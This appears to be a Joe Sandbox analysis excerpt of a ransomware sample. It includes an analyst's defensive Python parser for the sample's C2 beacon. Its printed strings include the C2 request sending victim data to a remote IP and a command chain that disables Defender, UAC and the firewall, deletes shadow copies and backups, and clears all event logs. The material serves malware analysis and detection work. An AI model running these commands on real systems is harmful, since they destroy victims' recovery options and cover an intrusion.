Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002DC26B FindFirstFileExA,42_2_002DC26B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022A2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_0022A2AA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00228A30 SetErrorMode,FindFirstFileW,42_2_00228A30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00228B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_00228B70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022B740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_0022B740
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CE140 GetLogicalDriveStringsA,1_2_008CE140

        Networking

Source: Network traffic | Suricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.6:49742 -> 185.147.34.53:3586
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 3586
Source: global traffic | TCP traffic: 192.168.2.6:49742 -> 185.147.34.53:3586
Source: global traffic | HTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:39:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aI4Dmwj4IAGsj1kBSGMcYydlQMVc9w0JoZmoaumhEXx06wC+fRSdEFpm5V6oWMp3tLPriQk05mszsyPy92zYenvnwEOpE5Cu5ynerWWnZRuY9JoBD7XQlmkj3dwcDaoB47TXLfKI9BVaKCyncaMp6B+5hpDTp/Voi1+nc81kqofSdhx+EmMJCDlQwjNLFyzVc6cN65bHpqoaELtCxFI079gXBCFsVljPKykMPlOE3C25nMWauaceeMu3QU7npybPaQYsB6QbzSUgY7T7z6JERI/gqMedNN4IYFtVQO/k2DgXYnXNHAnDRK9Z9LGqeYeHaeHuHllFjnHKE1DgIm6bZBGywl5BQ42uizHVtOKzNx+crjNEfSqeRAZ/AoyLX8dp9ntkCgWu/DNPGqfoTreXwIvnXcjuDzUrmajt76h+VO6YItix4AnTzd01lB2qCSH03T5gm67zlpLj0FhRUiTvrqP2NqDoiew5Ae6uW1wsBplqTyjoqe//Fub/uYviJB+iMJ7x236hVo/mhbRTTaxhRSNAyFzkbSOkxQDaFjT/Hs+La5BMaXZ714KdOWoxkMtmO7S03fKLsJKCsMVLWcGlGGGsmb9vjTXoD+pAgERAoIBABQkrJjcwevdSBz391Xp85+qa5GWs9LwVnB3O/sRSKBwDEtx7ssEXiFi5rYJBymqawBH99Z8EF0P+xZ+/TjFKhqrUeqajT7zLOzzdue2Mvp7DWTigZTYs7Z1QqbUM5I+FdGEmId4/Eu+u8tbJMm8CIn+jHUrSRFyEDHG67RBbFUzbWR60rQ5hQWwWO5nsOF/MoSImnAlisIiGYXZ3oCbEikPfqWPirXSM/nlmis396Rwyg99gxFMspcd8uXb1Ej9JCya6lA60jvhIXwvhTKUhLQYVSgy4UXzgKCzYylQ94CK91iuRzCTH1EGU6r60aSqBgmTPr+IEV6/c8U6nbg8Uv0CgYEA8W9HHP/6dkC1riy8YWIhdm+5ODj5rLNcVU0xBMNcfymS0+m55knP8GHuTWHNLVdX9K9LQ29FHj3r5sXNzpWi7z1HEjfsOPfV7c3PsUKGy4DsC5gxGsd+fSxEh6KAYe5YyhzzXTJ1FGtGQcb8C8CvcXxyfpLHQ0Y+8A99cBbEqbUCgYEAz3tzs7YMH3mXV2Riv4TQltr8PaTTn41dibO3IcburPD8hf7mnIMVEJrbWk0K9HT5bHUhw/7QLdQrRuBgD8BcEVBuZNvvvL00gKY9h6nXP2PZEf5vZmFxvUT57Thccztob5wRVv6zPHkGm4ZAeNwMO4TbYlPH4zpUNuAHWue2JqUCgYAcZ3HHLSyGYfdBquj8ZeXRssp/FcMFQkcZGCPicVYtE/Mn/WEqJs0rVtC9z0VQoN0r2GM1HCY/ywyxvOsJPsff6RdrjhvKd4KUcpDnrXlFHjnjPxTV+Vos2AgP9QALhXPbiu90YEoCZvk06jvFJbpJliuWa5742xZ2mGkcPun12QKBgQCq3iMMd82/kU91JX5/mo2paQv2h71WOC7p30uFOmo0EcDm0esXewJJ6PDg9Ccjq6A7M0j7wsmPJzKy1uWynmnwJB6tadR9UIWXH333QJMlJQ0d4Jf59eUydQoOpuK5P/unNTt00cDIY6sWqsuu01VeMS0jzIZ+5L3S1pylN0q2aQKBgQCYKsoAhyE9+439J6UCrYQ70hhCqko+reMPDsbMjXV0lOYCPTw0OX26h3uSj97pAAMAtPmarYf1x3MgNFi0OKYCKMKD10TQ1ZQO3eXLXmWARKYtu/cRWgVG91plhCdCwtyxhzaEXn1URPjvInuphn4h1q3y8tdjj99naN0D7r4UKQ==&77H75*7.999268(2)2,d5unlockingrdp3@gmail.com HTTP/1.1 | Host: 185.147.34.53 | Connection: close
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 185.147.34.53
Source: Joe Sandbox View | ASN Name: HOSTSLIM-GLOBAL-NETWORKNL
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | TCP traffic detected without corresponding DNS query: 185.147.34.53 (three connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008B8D10 std::locale::_Init,WSAStartup,socket,gethostbyname,htons,connect,send,recv,recv,closesocket,WSACleanup,1_2_008B8D10
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: text/* | User-Agent: YourUserAgent | Host: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 8AbMCL2dxM.exe, 00000001.00000002.3512126954.0000000000AE9000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/ows
Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgd
Source: 8AbMCL2dxM.exe, Xinfecter.exe.1.dr | String found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
Source: 8AbMCL2dxM.exe, Xinfecter.exe.1.dr | String found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc
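The beacon on port 3586 is a single GET whose path carries the victim profile in the clear (drive size, the "Fast_Mode" encryption mode, a first-seen and a current timestamp, the OS version, and the public IP the sample had just obtained from api.ipify.org), then a "~", a base64 blob, an "&", and a trailer ending in an e-mail address. Two things a responder wants from that packet are the parsed fields and a sanity check on the blob. Read as DER through the base64, the run AgERAoIBA decodes to a one-byte INTEGER 0x11 (a public exponent of 17) followed by a 256-byte INTEGER, and the five CgYEA/CgYAc/KBgQ runs are 129- and 128-byte INTEGERs, which is exactly the tail of a PKCS#1 RSA private key (e, d, p, q, dP, dQ, qInv). That reading is my inference from the encoding, not a statement in the report; if it holds, a full capture of this one request contains the per-victim private key. The parser below is an added example, not Joe Sandbox output or code from the sample. It works on a copy of the beacon path in which the blob is reduced to a few non-contiguous excerpts of the real one (marked as such in the code) and never decodes it; the field names are mine, inferred from this one request. The second function lists the request-level tells that the report's own signatures flag: HTTP on a non-standard port, no User-Agent on the C2 request, a bare-IP Host header, an e-mail address in the path, and the literal placeholder User-Agent "YourUserAgent" on the ipify lookup.

```python
import re

# Beacon path from the report's HTTP entry above (the text between "GET " and
# " HTTP/1.1").  The base64 blob between "~" and "&" is reduced here to a few
# non-contiguous excerpts of the real one so the constant stays readable;
# nothing below decodes it.
CLEAR = ("/110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____"
         "03/10/2023,_10:57:18$_06/12/2024-_7:39:[Version_10.0.19045.2006|"
         "Microsoft_Windows_10_Prohg3l,8.46.123.228")
BLOB = ("L8aI4Dmwj4IAGsj1kBSGMcYydlQMVc9w0JoZmoaumhEXx06wC+fRSdEFpm5V6oWMp3tL"
        "TXoD+pAgERAoIBABQkrJjcwevdSBz391Xp85+qa5GWs9LwVnB3O/sRSKBwDEtx7ssEXi"
        "nbg8Uv0CgYEA8W9HHP/6dkC1riy8YWIhdm+5ODj5rLNcVU0xBMNcfymS0+m55knP8GHu"
        "cBbEqbUCgYEAz3tzs7YMH3mXV2Riv4TQltr8PaTTn41dibO3IcburPD8hf7mnIMVEJrb"
        "Wue2JqUCgYAcZ3HHLSyGYfdBquj8ZeXRssp/FcMFQkcZGCPicVYtE/Mn/WEqJs0rVtC9"
        "Pun12QKBgQCq3iMMd82/kU91JX5/mo2paQv2h71WOC7p30uFOmo0EcDm0esXewJJ6PDg"
        "0q2aQKBgQCYKsoAhyE9+439J6UCrYQ70hhCqko+reMPDsbMjXV0lOYCPTw0OX26h3uSj"
        "naN0D7r4UKQ==")
TRAILER = "77H75*7.999268(2)2,d5unlockingrdp3@gmail.com"
BEACON_PATH = CLEAR + "~" + BLOB + "&" + TRAILER

# Field layout inferred from the one request in the report; the names are mine.
FIELD_RE = {
    "drive_size":      re.compile(r"Drive_Size:(\d+)"),
    "encryption_mode": re.compile(r"Encryption_Mode:_?([A-Za-z_]+?)!"),
    "first_seen":      re.compile(r"(\d{2}/\d{2}/\d{4}),_(\d{1,2}:\d{2}:\d{2})"),
    "this_run":        re.compile(r"(\d{2}/\d{2}/\d{4})-_(\d{1,2}:\d{2})"),
    "os":              re.compile(r"\[Version_([\d.]+)\|([^,]+),"),
    "public_ip":       re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})$"),
}
# DER INTEGER headers 02 81 81 / 02 81 80 as they look at the three base64
# alignments (offset 0: AoGA/AoGB, offset 1: KBgA/KBgQ, offset 2: CgYA/CgYE).
DER_INT129 = re.compile(r"AoG[AB]|KBg[AQ]|CgY[AE]")
# INTEGER e followed by a 0x01xx-byte INTEGER d: the e=0x11 form seen here and
# the common e=65537 form.
EXP_THEN_D = re.compile(r"AgERAoIBA|AgMBAAECggEA")


def parse_beacon(path):
    """Split the beacon into clear-text victim fields, the base64 blob and the trailer."""
    clear, sep, rest = path.partition("~")
    if not sep:
        raise ValueError("not the '~'-delimited layout this parser expects")
    blob, _, trailer = rest.partition("&")
    info = {}
    for key, rx in FIELD_RE.items():
        m = rx.search(clear)
        info[key] = None if m is None else (m.group(1) if rx.groups == 1 else m.groups())
    info["drive_size"] = int(info["drive_size"]) if info["drive_size"] is not None else None
    mail = re.search(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", trailer)
    info["contact"] = mail.group(0) if mail else None
    info["blob_is_base64"] = re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", blob) is not None
    info["der_int129_markers"] = len(DER_INT129.findall(blob))
    info["exp_then_privexp_marker"] = EXP_THEN_D.search(blob) is not None
    return info


def looks_like_rsa_private_key(info):
    """Heuristic only: base64, an e-then-d header, and at least four of the five
    129/128-byte INTEGERs (p, q, dP, dQ, qInv) a PKCS#1 RSA-2048 private key carries."""
    return bool(info["blob_is_base64"] and info["exp_then_privexp_marker"]
                and info["der_int129_markers"] >= 4)


def beacon_indicators(dst_port, headers, path):
    """Request-level tells, each a plain property of the HTTP request."""
    found = []
    names = {k.lower(): v for k, v in headers.items()}
    if dst_port not in (80, 8080, 8000):
        found.append("http_on_nonstandard_port")
    if "user-agent" not in names:
        found.append("no_user_agent")
    elif names["user-agent"] == "YourUserAgent":   # leftover placeholder seen on the ipify lookup
        found.append("placeholder_user_agent")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", names.get("host", "")):
        found.append("host_header_is_bare_ip")
    if "@" in path:
        found.append("email_in_url_path")
    return found


if __name__ == "__main__":
    info = parse_beacon(BEACON_PATH)
    for k, v in info.items():
        print(f"{k:26} {v}")
    print("rsa_private_key_shape:", looks_like_rsa_private_key(info))
    print(beacon_indicators(3586, {"Host": "185.147.34.53", "Connection": "close"}, BEACON_PATH))
```

The "Netword" spelling in the path, the placeholder User-Agent and the bare-IP Host header are all good network signatures because none of them depends on the per-victim content. The key-shape check is deliberately a count of DER headers rather than a decode: on a live capture you would decode the blob and feed it to an ASN.1 parser, but a header count is enough to decide whether the capture is worth preserving.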

        Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: Process Memory Space: 8AbMCL2dxM.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 8AbMCL2dxM.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Xinfecter.exe PID: 3164, type: MEMORYSTR
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 1_2_008D4819
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 1_2_008DC940
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 1_2_008DD85F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 42_2_00234819
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 42_2_0023C940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 42_2_0023D85F
Source: 8AbMCL2dxM.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
Source: 8AbMCL2dxM.exe, 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: 8AbMCL2dxM.exe, 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: 8AbMCL2dxM.exe, 00000001.00000003.2271855364.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: 8AbMCL2dxM.exe, 00000001.00000003.2271855364.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: 8AbMCL2dxM.exe, 00000001.00000000.2246238514.0000000000993000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: 8AbMCL2dxM.exe, 00000001.00000000.2246238514.0000000000993000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: Xinfecter.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
        Source: Xinfecter.exe, 0000002A.00000000.2361058622.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: Xinfecter.exe, 0000002A.00000000.2361058622.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: Xinfecter.exe, 0000002A.00000002.2362815131.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: Xinfecter.exe, 0000002A.00000002.2362815131.00000000002F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: 8AbMCL2dxM.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: 8AbMCL2dxM.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: S-6748.bat.1.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
        Source: Xinfecter.exe.1.drBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        Source: Xinfecter.exe.1.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet

        System Summary

        Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0093D060: CreateFileW,DeviceIoControl,CloseHandle
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Windows\SysMain.sys
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Windows\SysMain.sys
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008D4819
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008DC940
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00916AEB
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C4E20
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008B9300
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0095C027
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0097A079
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00924060
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0091E190
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0092A108
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C6280
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CA2AA
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009442F5
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CE2E0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0097237D
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00916484
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0096A4E0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00924470
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F4680
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009166A8
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C06F8
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009187A0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F0880
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009189A0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00924910
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008FAAC0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008B8AE0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00944AE4
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C8A30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00902BC0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C8B70
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00918C40
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0091CFC5
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00916F46
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009250D0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CF020
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0096F11B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C72E7
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00947268
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00981304
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008B5330
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00925370
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F9690
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F1600
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0094965A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009157B4
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009157A7
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009597F0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0091D73F
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CB740
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00901AA0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008BBAB0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0091DAC6
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00959A62
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008BDB00
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F3B00
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00915B3B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0096BC8B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F5C00
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00963DB3
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0093FDF0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0091DD57
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CFD50
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008F1E30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00963FE2
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00234819
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0023C940
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00224E20
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002BC027
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00284060
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002DA079
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0028A108
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0027E190
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022A2AA
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00226280
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022E2E0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A42F5
